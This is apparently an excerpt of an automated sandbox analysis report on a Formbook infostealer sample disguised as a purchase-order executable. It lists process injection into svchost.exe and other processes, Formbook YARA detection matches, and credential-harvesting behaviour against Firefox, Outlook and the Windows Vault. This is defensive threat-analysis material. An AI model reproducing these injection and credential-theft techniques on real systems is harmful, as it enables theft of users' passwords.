            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EB739A5_2_02EB739A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E5D34C5_2_02E5D34C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2132D5_2_02F2132D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2F0E05_2_02F2F0E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F270E95_2_02F270E9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E770C05_2_02E770C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F1F0CC5_2_02F1F0CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7B1B05_2_02E7B1B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA516C5_2_02EA516C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E5F1725_2_02E5F172
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F3B16B5_2_02F3B16B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F216CC5_2_02F216CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2F7B05_2_02F2F7B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E614605_2_02E61460
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2F43F5_2_02F2F43F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F0D5B05_2_02F0D5B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F275715_2_02F27571
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F1DAC65_2_02F1DAC6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EB5AA05_2_02EB5AA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F11AA35_2_02F11AA3
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F0DAAC5_2_02F0DAAC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EE3A6C5_2_02EE3A6C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F27A465_2_02F27A46
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FA495_2_02F2FA49
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EADBF95_2_02EADBF9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EE5BF05_2_02EE5BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8FB805_2_02E8FB80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FB765_2_02F2FB76
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E738E05_2_02E738E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EDD8005_2_02EDD800
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E799505_2_02E79950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8B9505_2_02E8B950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F059105_2_02F05910
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E79EB05_2_02E79EB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FFB15_2_02F2FFB1
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E71F925_2_02E71F92
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FF095_2_02F2FF09
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FCF25_2_02F2FCF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EE9C325_2_02EE9C32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8FDC05_2_02E8FDC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F27D735_2_02F27D73
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E73D405_2_02E73D40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F21D5A5_2_02F21D5A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_00351AB05_2_00351AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0034CA305_2_0034CA30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0034CA275_2_0034CA27
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0034CC505_2_0034CC50
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0034ACD05_2_0034ACD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_003551705_2_00355170
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0035333B5_2_0035333B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_003533405_2_00353340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0036B6C05_2_0036B6C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDE2D55_2_02BDE2D5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDE3FB5_2_02BDE3FB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDE78C5_2_02BDE78C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDD7F85_2_02BDD7F8
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: String function: 00170A30 appears 46 times
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: String function: 0016F9F2 appears 40 times
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: String function: 00159CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03987E54 appears 111 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02EB7E54 appears 102 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02EEF290 appears 105 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02EA5130 appears 58 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02EDEA12 appears 86 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02E5B970 appears 280 times
Source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000041C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dll vs PO2-2401-0016 (TR).exe
Source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059736752.000000000436D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ntdll.dll vs PO2-2401-0016 (TR).exe
Source: PO2-2401-0016 (TR).exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/13
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C37B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001B10BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001B16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001DA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001542A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | File created: C:\Users\user\AppData\Local\Temp\dews
Source: PO2-2401-0016 (TR).exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000710000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2513035747.0000000000710000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2512883594.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2519343965.000000000071A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.000000000073F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO2-2401-0016 (TR).exe | Virustotal: Detection: 48%
Source: PO2-2401-0016 (TR).exe | ReversingLabs: Detection: 50%
Source: unknown | Process created: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe | Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO2-2401-0016 (TR).exeStatic file information: File size 1724416 > 1048576
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WwOlfblnYaWmLq.exe, 00000003.00000000.2201599538.00000000007AE000.00000002.00000001.01000000.00000004.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4508332207.00000000007AE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.2247452645.0000000003F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2247372843.000000000321A000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4513030098.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4509012670.0000000001498000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, PO2-2401-0016 (TR).exe, 00000000.00000003.2061283360.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184300413.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182333043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2282930562.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2284887990.0000000002C85000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, PO2-2401-0016 (TR).exe, 00000000.00000003.2061283360.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2279732575.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184300413.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182333043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000005.00000003.2282930562.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2284887990.0000000002C85000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000005.00000002.4510222204.000000000345C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2626008848.000000002F2AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000005.00000002.4510222204.000000000345C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2626008848.000000002F2AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000002.00000003.2247452645.0000000003F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2247372843.000000000321A000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4513030098.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4509012670.0000000001498000.00000004.00000020.00020000.00000000.sdmp
Source: PO2-2401-0016 (TR).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO2-2401-0016 (TR).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO2-2401-0016 (TR).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO2-2401-0016 (TR).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO2-2401-0016 (TR).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_001542DE
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_00170A76 push ecx; ret 0_2_00170A89
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004019A7 push es; retf 2_2_00401A2B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00406005 push ds; ret 2_2_00406010
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408818 push edi; ret 2_2_004088A4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401A29 push es; retf 2_2_00401A2B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414CD3 push edi; iretd 2_2_00414CE1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004144AE push ebx; iretd 2_2_004144AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401566 push esi; iretd 2_2_004015F7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401522 push esi; iretd 2_2_004015F7
